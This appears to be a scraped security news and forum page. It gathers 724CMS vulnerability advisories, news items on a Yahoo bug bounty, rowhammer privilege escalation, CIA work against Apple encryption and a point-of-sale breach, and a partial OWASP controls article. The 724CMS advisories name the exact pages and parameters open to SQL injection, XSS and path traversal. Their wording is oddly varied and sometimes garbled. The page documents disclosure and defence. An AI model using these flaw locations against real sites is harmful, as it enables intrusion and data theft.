NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg
blEAn3uS87tqYInkFZtz8QNOjlVcU7l0
=6XaT
-----END PGP SIGNATURE-----

Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt
  14. 724CMS 5.01 / 4.59 / 4.01 / 3.01 Information Leakage

*724CMS 5.01 Multiple Information Leakage Security Vulnerabilities*

Exploit Title: 724CMS Multiple Information Leakage Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01 4.01 4.59 5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.0 (MEDIUM) (AV:N/AC:L/Au:N/C:P/I:N/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Suggestion Details:*

*(1) Vendor & Product Description:*

*Vendor:*
724CMS Enterprise

*Product & Vulnerable Versions:*
724CMS 3.01 4.01 4.59 5.01

*Vendor URL & download:*
724CMS can be got from here, http://724cms.com/

*Product Introduction Overview:*
724CMS is a content management system (CMS) that has large customers spread in Canada, Japan, Korea, the United States and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment.

*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by information leakage attacks - Full Path Disclosure (FPD). This may allow a remote attacker to disclose the software's installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to 724CMS vulnerabilities.

*(2.1)* The first code programming flaw occurs at "index.php" page with "&Lang", "&ID" parameters.

*(2.2)* The second code programming flaw occurs at "section.php" page with "&Lang", "&ID" parameters.

*References:*
http://tetraph.com/security/information-leakage-vulnerability/724cms-5-01-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-information-leakage-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-information-leakage-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-information-leakage-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/724cms-5-01-information-leakage-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576280203098&w=4
http://en.hackdig.com/wap/?id=17055

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

724CMS 5.01 / 4.59 / 4.01 / 3.01 Directory Traversal

*724CMS 5.01 Directory (Path) Traversal Security Vulnerabilities*

Exploit Title: 724CMS /section.php Module Parameter Directory Traversal Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01 4.01 4.59 5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discoverer and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]

*Recommendation Details:*

*(1) Vendor & Product Description:*

*Vendor:*
724CMS Enterprise

*Product & Vulnerable Versions:*
724CMS 3.01 4.01 4.59 5.01

*Vendor URL & download:*
724CMS can be bargained from here, http://724cms.com/

*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korea, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows."

*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by Directory Traversal - Local File Include (LFI) attacks. A local file inclusion (LFI) flaw is due to the script not properly sanitizing user input, specifically path traversal style attacks (e.g. '../../') supplied to the parameters. With a specially crafted request, a remote attacker can include arbitrary files from the targeted host or from a remote host. This may allow disclosing file contents or executing files like PHP scripts. Such attacks are limited due to the script only calling files already on the target host.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities.

*(2.1)* The first cipher programming flaw occurs at "/section.php" page with "&Module" parameter.

*References:*
http://www.tetraph.com/security/directory-traversal-vulnerability/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-directory-path-traversal.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-directory-path-traversal-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-directory-path-traversal-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://en.hackdig.com/wap/?id=17404

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

724CMS 5.01 / 4.59 / 4.01 / 3.01 SQL Injection

*724CMS 5.01 Multiple SQL Injection Security Vulnerabilities*

Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01 4.01 4.59 5.01
Tested Version: 5.01
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Recommendation Details:*

*(1) Vendor & Product Description:*

*Vendor:*
724CMS Enterprise

*Product & Vulnerable Versions:*
724CMS 3.01 4.01 4.59 5.01

*Vendor URL & download:*
724CMS can be gained from here, http://724cms.com/

*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korea, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows."

*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has phase, votes, comments and proposed details related to 724CMS vulnerabilities.

*(2.1)* The first cipher programming flaw occurs at "/index.php" page with "&Lang", "&ID" parameters.

*(2.2)* The second cipher programming flaw occurs at "/section.php" page with "&Lang", "&ID" parameters.

*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-sql-injection.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-sql-injection-security-vulnerabilities/
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01766.html
http://marc.info/?a=139222176300014&r=1&w=4
http://en.1337day.com/exploit/23308

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious

724CMS 5.01 / 4.59 / 4.01 / 3.01 Cross Site Scripting

*724CMS 5.01 Multiple XSS (Cross-site Scripting) Security Vulnerabilities*

Exploit Title: 724CMS Multiple XSS (Cross-site Scripting) Security Vulnerabilities
Vendor: 724CMS
Product: 724CMS
Vulnerable Versions: 3.01 4.01 4.59 5.01
Tested Version: 5.01
Advisory Publication: March 15, 2015
Latest Update: March 15, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU), Singapore]

*Recommendation Details:*

*(1) Vendor & Product Description:*

*Vendor:*
724CMS Enterprise

*Product & Vulnerable Versions:*
724CMS 3.01 4.01 4.59 5.01

*Vendor URL & download:*
724CMS can be purchased from here, http://724cms.com/

*Product Introduction Overview:*
"724CMS is a content management system (CMS) that has customers spread in Canada, Japan, Korea, the United States, European and many others. It allows publishing, editing and modifying content, organizing, deleting as well as maintenance from a central interface. Meanwhile, 724CMS provides procedures to manage workflow in a collaborative environment."

"A CMS helps you create and store content in a shared repository. It then manages the relationships between content items for you (e.g. keeping track of where they fit into the site hierarchy). Finally, it ensures that each content item is connected to the right style sheet when it comes to be published. Some CMSs also provide facilities to track the status of content items through editorial processes and workflows."

*(2) Vulnerability Details:*
724CMS web application has a security bug problem. It can be exploited by XSS attacks. This may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server.

Several 724CMS products vulnerabilities have been found by some other bug hunter researchers before. 724CMS has patched some of them. The MITRE Corporation is a not-for-profit company that operates multiple federally funded research and development centers (FFRDCs), which provide innovative, practical solutions for some of our nation's most critical challenges in defense and intelligence, aviation, civil systems, homeland security, the judiciary, healthcare, and cybersecurity. It has published suggestions, advisories, solutions details related to 724CMS vulnerabilities.

*(2.1)* The first code programming flaw occurs at "/index.php" page with "&Lang" parameter.

*(2.2)* The second code programming flaw occurs at "/section.php" page with "&Lang", "&ID", "&Nav" parameters.

*References:*
http://www.tetraph.com/security/xss-vulnerability/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/724cms-501-multiple-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
https://computertechhut.wordpress.com/2015/03/14/724cms-5-01-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142576259903051&w=4
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html
http://en.hackdig.com/?16117.htm

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU), Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious
  15. Yahoo! has offered $24,000 to a security researcher for finding out and reporting three critical security vulnerabilities in its products including Yahoo! Stores and Yahoo!-hosted websites. While testing all the company's application, Mark Litchfield, a bug bounty hunter who often works with different companies, discovered three critical vulnerabilities in Yahoo!'s products. All the three vulnerabilities have now been fixed by Yahoo!. THREE CRITICAL SECURITY VULNERABILITIES The first and most critical vulnerability gives hackers full administrator access to Yahoo!'s e-commerce platform, Yahoo! Small Business, a portal that allows small business owners to create their own web stores through Yahoo! and sell merchandise. According to the researcher, the flaw in the service allowed him to fully administrator any Yahoo store and thereby gain access to customers' personally identifiable information, including names, email addresses, telephone numbers. BUG ALLOWS FREE SHOPPING Beside allowing hackers full admin access to the web stores, the vulnerability could also leverage an attacker to rig a user-run eCommerce web store to let them shop for free, or at a huge discount, Litchfield claimed. A separate but related vulnerability in Yahoo! Stores, second flaw discovered by Litchfield, allows an unauthorized user to edit Yahoo-hosted stores through the app, thereby creating a means for hackers to hijack an online website store. Last but not the least, Litchfield discovered a critical vulnerability in Yahoo’s Small Business portal that allows hackers to seize administrative access to Yahoo!-hosted websites and gain full, unauthorized access to them. The Internet giant patched all the three bugs two weeks ago after Litchfield publicly released details and proof of concepts for the exploits on Bug Bounty HQ, a community for Bug Bounties website, established by Litchfield last month for fellow hunters to share their findings. 
'ON DEMAND PASSWORD'

At a recent SXSW session, Yahoo! launched 'on-demand passwords,' which it says will eliminate the need for you to ever remember your email password. Whenever you need it, the company will send you an OTP (one time password) via SMS to your mobile phone. It's sort of two-factor authentication without the first factor involved, as there is no need for any log-in password to be entered by the user.

In order to opt in for the feature, follow some simple steps:

1. Sign in to your Yahoo email account.
2. Click on your name at the top right corner to access your account information page.
3. Choose Security in the sidebar.
4. Click on the slider for on-demand passwords, in order to opt in.
5. Enter your phone number and Yahoo will send you a verification code.
6. Enter the code.

Now, the next time you sign in to your email account, Yahoo will send a password via SMS to your phone when you need it.

Also, the end-to-end email encryption that Yahoo! promised will be available by the end of this year. The company gave its first demonstration of the locked-down messaging system at the SXSW session, and it is also delivering early source code for security researchers to analyze.

Source
  16. Full materials and proof of concept code have been released for the Security Explorations discovery of various Google App Engine Java security sandbox bypasses.

Download pack: Google App Engine Java Security Sandbox Bypasses ≈ Packet Storm
  17. The Cyber Security Challenge final has launched, tasking 42 amateur white hats to regain control of a naval gun system on board HMS Belfast as part of a simulated cyber attack by the 'Flag Day Associates' hacktivist group.

The final challenge is the brainchild of experts from GCHQ, the National Crime Agency, Lockheed Martin, Airbus Group, PGI, C3IA and Palo Alto Networks (in partnership with BT). The finalists will attempt to regain control of a gun system which has been hacked remotely and forced to target London's City Hall.

Contestants will also be required to find similar security holes in a simulated water treatment and manufacturing facility using industry-standard tools, such as the Kali Linux distribution. The winner will be crowned on Friday.

The simulation is the final round in the fifth Cyber Security Challenge, which has seen "thousands" of entrants combat the Flag Day Associates in a variety of fictional situations. The challenge is designed to help businesses and government departments spot talented individuals and recruit them into cyber security.

Stephanie Daman, CEO of the Cyber Security Challenge, said that many of 2014's finalists now have cyber security jobs. "Around half of last year's finalists are already in their first cyber security jobs, whilst the majority of the rest are well on their way, taking training courses, accreditations or internships to boost their CVs. There is no reason why all 42 of our finalists today can't follow in their footsteps."

Past winners include 19-year-old student William Shackleton and chemist Stephen Miller.

Cabinet Office minister Francis Maude listed the high turnout and success of participants finding cyber security jobs as proof of the challenge's success. "Today's competition highlights the very best new cyber security talent as they are challenged by a set of exciting and innovative scenarios developed by GCHQ alongside industry experts," he said.
"Government and business need skilled and talented people to feed the demand for better cyber security in the UK. This competition is the biggest and best yet, and events like this play an important role in providing the next generation of cyber professionals."

The challenge final follows a wider push by the UK government to better defend critical infrastructure systems against cyber attacks. The UK and US governments announced plans to mount a series of simulated cyber war games in January with the intention of bolstering critical infrastructure systems.

The initiatives follow warnings that the cyber threat facing critical infrastructure is growing. The US Industrial Control Systems Cyber Emergency Response Team revealed on Thursday that US industrial control systems were hit by cyber attacks at least 245 times over a 12-month period.

Source
  18. Intel Security (formerly McAfee) has announced a security platform designed to protect both new and legacy infrastructure within the electric power grid.

Dubbed Intel Security Critical Infrastructure Protection (CIP), the solution was developed in collaboration with the Department of Energy-funded Discovery Across Texas smart grid project, including deployment at Texas Tech University, and is a joint project of Intel Security and Wind River.

Intel Security CIP works by separating the security management functions of the platform from the operational applications, allowing the operational layer to be secured, monitored and managed, the company explained.

According to Intel Security, the security platform can be applied with little or no changes to business processes or application software, and can be retrofitted onto many existing systems. Features include protection such as device identity, malware protection, data protection and resiliency.

Intel believes the solution can be leveraged beyond the power grid and could be equally effective for departments of defense, oil and gas firms, medical applications, and other areas.

According to a study sponsored by Intel, "In the Dark: Crucial Industries Confront Cyberattacks," of the 200 CIP executives surveyed globally, 32% had not adopted special security measures for smart grid controls. Yet 33% anticipated a major cybersecurity incident within 12 months.

Related: Learn More at the 2015 ICS Cyber Security Conference

"The risk of cyberattacks on critical infrastructure is no longer theoretical, but building security into the grid is challenging due to the amount of legacy infrastructure and the importance of availability of service," Lorie Wigle, Vice President of Internet of Things Security Solutions for Intel Security, said in a statement.
"Traditional security measures such as patching and rebooting are often inappropriate for the grid, so we set out to design something entirely different that could be non-invasive but simultaneously robust."

"From December 2013 to January 2015, the Intel Security CIP was in a field trial at Texas Tech University, where it performed as required by NIST standards and withstood penetration testing, as well as protected the synchrophasor applications during the Heartbleed vulnerability and Havex attacks," said Milton Holloway, President & COO, Center for the Commercialization of Electric Technologies. "This project was an outstanding example of a successful public-private partnership in that it produced technologies that are market-ready. What could be a better outcome of a demonstration project?"

Sursa: securityweek.com
  19. Funding from the Core Infrastructure Initiative has helped the maintainers of OpenSSL, one of the Internet's most-deployed pieces of open source software, begin to get the crypto implementation on its feet.

Despite its ubiquity, OpenSSL has historically been under-funded and under-resourced, though no one outside those close to the project knew how dire the situation was until Heartbleed and other Internet-wide bugs started experts looking closely at the security of open source software.

With funding from CII and other corners of the Internet, full-time help has been hired to maintain the regular flow of patches and feature upgrades, and since last spring, get the code base ship-shape for a full-fledged security audit.

NCC Group Cryptography Services, the security company behind the first phase of the TrueCrypt audit, Monday announced that it, in partnership with the Linux Foundation, will conduct an audit of OpenSSL, looking at key components likely to put installations at risk in the event of a critical vulnerability.

"A number of folks who have contributed their free time and professional time, kept OpenSSL growing," said Tom Ritter, principal security engineer at NCC. "A lot of those contributions were around making OpenSSL more efficient and improving speed, and security improvements. Now, being able to have people work on it fulltime in a maintenance capacity goes a long way. Any project that old accumulates technical debt that takes time and effort to pay down. Having fulltime focus on bug maintenance is super important."

OpenSSL's code cleanup paved the way for the audit, Ritter said. Engineers spent significant time re-reading areas of code of most concern, and fixing bugs along the way, in order to make the code more reliable, consistent and secure. Ritter said work on the audit should begin shortly, and the first set of results will be made available mid-Summer after OpenSSL has had time to review the results and patch.
Ritter said the audit will be concentrated only in certain critical areas of the OpenSSL codebase, and will not be comprehensive. In scope are the TLS stacks, covering protocol flow, state transitions, and memory management. The BIOs, high-profile crypto algorithms and fuzzing of the ASN.1 and X.509 parsers will also happen, Ritter said, adding that input and feedback from the current OpenSSL team also contributed to what ultimately ended up in scope for the audit.

"We chose areas around OpenSSL where a flaw here might be of higher severity than other areas," Ritter said. "The types of things we'll be looking for are things such as protocol mishandling or state transitions, things like that, even timing attacks in crypto algorithms, or memory corruption that would yield a denial of service condition or remote code execution. Those are the types of bugs we're looking for. If we find one of those, it has the possibility of being fairly critical."

Unlike the TrueCrypt audit, where one of the stated goals was to determine whether the popular encryption software had been backdoored, that isn't necessarily the case with OpenSSL, Ritter said.

"You haven't heard much about [backdoors] in OpenSSL," Ritter said. "Our real goal is to find any sort of exploitable security concerns. I think that we're focusing on it from the perspective of a security audit."

Expect Ritter and his team to spend plenty of time in front of large whiteboards for the next few months, tracing out function flows and diagramming the code in order to support the manual and automated code review it will take to properly assess OpenSSL. And while the audit may not yield something as dramatic as Heartbleed, you can expect Ritter's team to be looking in that direction.

"Certainly looking at historical bugs in the platform gives us an idea of the types of flaws present still; it will be helpful," Ritter said.
"I'm not going to say we're going to go in expecting to find any particular bug in a particular area, but looking at historical bugs does guide us in certain areas, as do a lot of the less high-profile bugs. Looking at just about any bug and seeing the underlying causes of it gives us a sense that if something similar is happening elsewhere, there could be a bug there."

Source
  20. Security researchers at the Central Intelligence Agency (CIA) have worked for almost a decade to target the security keys used to encrypt data stored on Apple devices in order to break the system.

Citing top-secret documents obtained from NSA whistleblower Edward Snowden, The Intercept reported that, among attempts to crack the encryption keys implanted into Apple's mobile processor, the researchers working for the CIA had created a dummy version of Xcode.

CIA'S WEAPON TO HACK APPLE DEVICES

Xcode is Apple's application development tool, used to create the vast majority of iOS apps. However, using the compromised development software, the CIA, NSA or other spy agencies were potentially able to inject a surveillance backdoor into programs distributed on Apple's App Store.

In addition, the custom version of Xcode could also be used to spy on users, steal passwords and account information, intercept communications, and disable core security features of Apple devices.

The latest documents from the National Security Agency's internal systems revealed that the researchers' work was presented at its 2012 annual gathering called the "Jamboree", a CIA-sponsored secretive event which has run for nearly a decade, at a Lockheed Martin facility in northern Virginia.

KEYLOGGER FOR MAC COMPUTERS

According to the report, "essential security keys" used to encrypt data stored on Apple's devices have become a major target of the research team. Overall, the U.S. government-sponsored researchers are seeking ways to decrypt this data, as well as penetrate Apple's firmware, using both "physical" and "non-invasive" techniques.

In addition to this, the security researchers also presented how they successfully modified the OS X updater, a program used to deliver updates to laptop and desktop computers, in an attempt to install a "keylogger" on Mac computers.
HACKING ENCRYPTION KEYS

Another presentation from 2011 showed different techniques that could be used to hack Apple's Group ID (GID), one of the two encryption keys that Apple places on its iPhones. One of the techniques involved studying the electromagnetic emissions of the GID and the amount of power used by the iPhone's processor in order to extract the encryption key, while a separate method focused on a "method to physically extract the [Apple's] GID key."

Although the documents do not specify how successful or not these surveillance operations have been against Apple, it once again provokes the ongoing battle between spy agencies and tech companies, as well as the dishonesty of the US government.

'SPIES GONNA SPY'

On one hand, President Barack Obama criticized China for forcing tech companies to install security backdoors for the purpose of government surveillance. On the other hand, The Intercept notes that China is just following America's lead, that's it.

"Spies gonna spy," said Steven Bellovin, a computer science professor at Columbia University and former chief technologist for the FTC. "I'm never surprised by what intelligence agencies do to get information. They're going to go where the info is, and as it moves, they'll adjust their tactics. Their attitude is basically amoral: whatever works is OK."

We have already reported on NSA and GCHQ's various surveillance programs, including PRISM, XkeyScore, DROPOUTJEEP, and many more.

Source
  21. Rowhammer: NaCl Sandbox Escape PoC
Rowhammer: Linux Kernel Privilege Escalation PoC

Software, from web apps, to operating systems to firmware, has been abused and exploited every which way from Sunday for decades by both researchers and attackers. Now, it is hardware's turn in the spotlight, as researchers have published details of a new method for exploiting a problem with some DRAM memory devices that can allow attackers to get low-level access to target machines.

The problem is being called "rowhammer", as it's a method for repeatedly hammering on rows of cells of memory in DRAM devices to induce cells to flip from one state to another. Using a new technique to exploit the rowhammer issue, researchers at Google were able to produce these bit flips in cells and gain kernel-level privileges. Security researchers say the technique is some of the more important work done on exploitation in recent years and could affect a huge number of laptops and desktop machines.

"[It] is a brilliant attack and because it's a hardware flaw, there are really no ways to patch it," said Alfredo Ortega, a longtime security researcher and co-founder of Groundworks Technologies.

Researcher Mark Seaborn on Monday published a detailed technical explanation of techniques to exploit the rowhammer issue, which was described earlier in an academic paper by researchers from Intel and Carnegie Mellon University. The basic concept behind rowhammer relies on the fact that the cells of memory on DRAM devices have become closer and closer together over time, meaning that it has become more difficult to prevent electrons from jumping from one cell to another. By accessing target cells in DRAM over and over again, an attacker can disturb a cell adjacent to the target cells, causing it to "bit flip" under some circumstances.

"'Rowhammer' is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows.
We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process," Seaborn wrote in his post. "When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory."

Seaborn tested his technique on 29 different machines with several different CPUs and DRAM from several vendors and observed a bit flip in 15 cases. However, he stressed that the lack of an observed bit flip does not mean that the DRAM isn't necessarily exploitable.

"While an absence of bit flips during testing on a given machine does not automatically imply safety, it does provide some baseline assurance that causing bit flips is at least difficult on that machine," Seaborn said.

Ortega said that the new technique is effective thanks to the way that DRAM devices are designed now.

"Modern memory is flawed, vendors cut corners a lot to save power and make cheap tiny chips, so if you access too quickly a section of it, or if you turn on and off a memory cell too quickly, the adjacent memory cells will also be affected," he said. "The trick is to find a memory cell that stores something important and that you cannot access for security reasons, for example a memory cell storing a password, or file permissions, and then flip a cell next to it. Eventually the memory cell will flip, even if you don't have access to it."

Mitigating rowhammer attacks is possible, Seaborn said. For example, manufacturers can make sure that when a system refreshes DRAM memory it doesn't activate a given row too often without also refreshing nearby rows.
The rowhammer issue is not unknown to DRAM manufacturers, as some of them may already have implemented some mitigations.

"Looking backward, had there been more public disclosures about the rowhammer problem, it might have been identified as an exploitable security issue sooner. It appears that vendors have known about rowhammer for a while, as shown by the presence of rowhammer mitigations in LPDDR4. It may be that vendors only considered rowhammer to be a reliability problem," Seaborn said.

Security researcher Dan Kaminsky, chief scientist of White Ops, said that the attack is effective in a surprising number of cases.

"This sort of bug fills memory (the grand collection of buckets in your computer) with lots and lots of areas where checks for God-like power depend on the bucket being empty. Then it shakes specially chosen buckets, 'aggressor buckets', to try to leak a 1 into all those 0's. And on a surprising amount of hardware, it works," Kaminsky said via email.

However, one good defense against the attack is the use of ECC memory, which has extra bits to help correct errors. ECC is more expensive, though, and mainly is used in servers rather than laptops and desktops, said researcher Robert Graham of Errata Security.

"The biggest threat at the moment appears to be to desktops/laptops, because they have neither ECC memory nor virtual machines. In particular, there seems to be a danger with Google's Native Client (NaCl) code execution. This is a clever sandbox that allows the running of native code within the Chrome browser, so that web pages can run software as fast as native software on the system. This memory corruption defeats one level of protection in NaCl. Nobody has yet demonstrated how to use this technique in practice to fully defeat NaCl, but it's likely somebody will discover a way eventually," Graham said.
The new techniques, Seaborn said, are a good example of why manufacturers and researchers should be paying close attention to hardware vulnerabilities.

"History has shown that issues that are thought to be 'only' reliability issues often have significant security implications, and the rowhammer problem is a good example of this. Many layers of software security rest on the assumption the contents of memory locations don't change unless the locations are written to," he said. "Though the industry is less accustomed to hardware bugs than to software bugs, we would like to encourage hardware vendors to take the same approach: thoroughly analyse the security impact of 'reliability' issues, provide explanations of impact, offer mitigation strategies and, when possible, supply firmware or BIOS updates. Such discussion will lead to more secure hardware, which will benefit all users."

Source
  22. Michigan-based provider of point-of-sale devices NEXTEP SYSTEMS is investigating a possible security compromise of customer systems, according to a statement emailed to SCMagazine.com on Monday by Tommy Woycik, president of NEXTEP SYSTEMS.

"NEXTEP was recently notified by law enforcement that the security of the systems at some of our customer locations may have been compromised," according to the statement, which goes on to add, "We do know that this is NOT affecting all NEXTEP customers, and we have been working with our customers to ensure that any issues are addressed."

An investigation is ongoing with law enforcement and data security experts.

On Monday, technology journalist Brian Krebs reported that financial industry sources identified a pattern of fraud on payment cards used recently at Zoup!, a restaurant chain and NEXTEP SYSTEMS customer. He wrote that Zoup! referred him to NEXTEP SYSTEMS.

Source
  23. In the first part of this series, we covered the top 5 OWASP ProActive Controls and learned how they can prove to be of great use in securing applications. In this part, we will look at the last 5 OWASP ProActive Controls and learn more about them.

Protect Data and Privacy

This control helps to protect our data inside a database. Sensitive data like passwords, credit card details and bank account details should be stored in encrypted or hashed format inside a database or the chosen data storage. One should not use encryption and hashing interchangeably, as encryption and hashing are entirely different from each other.

Encryption is used to convert readable text or plain text into unreadable text or cipher text. Encryption is a two-way data conversion technique, meaning data which is encrypted can also be decrypted (if you have the decryption key). Encryption can be done in two main ways:

- Symmetric method
- Asymmetric method

Symmetric encryption or Secret Key Cryptography (SKC) uses a secret key for encryption and decryption. It means the receiver uses the same key that was used for encryption to decrypt.

Asymmetric method or Public Key Cryptography (PKC) uses two sets of keys to perform encryption and decryption. One is a public key and another is a private key. The public key is used for data encryption and the private key is used for data decryption.

Depending upon your application requirement, developers can choose between the two encryption methods.

Hashing is different from encryption; unlike encryption, it is a one-way process. It means data that's converted into hashed format can never be converted back into plain text.

An application cannot choose hashing or encryption just like that. A secure storage technique is chosen depending upon the data that has to be stored securely. If at some time in the future the sensitive data is to be shown to the user in plaintext, then encryption is the best option (plaintext <-> ciphertext).
If the sensitive data is to be stored for some validation, authentication or verification, then a hash should be stored (plaintext -> hash). For example:

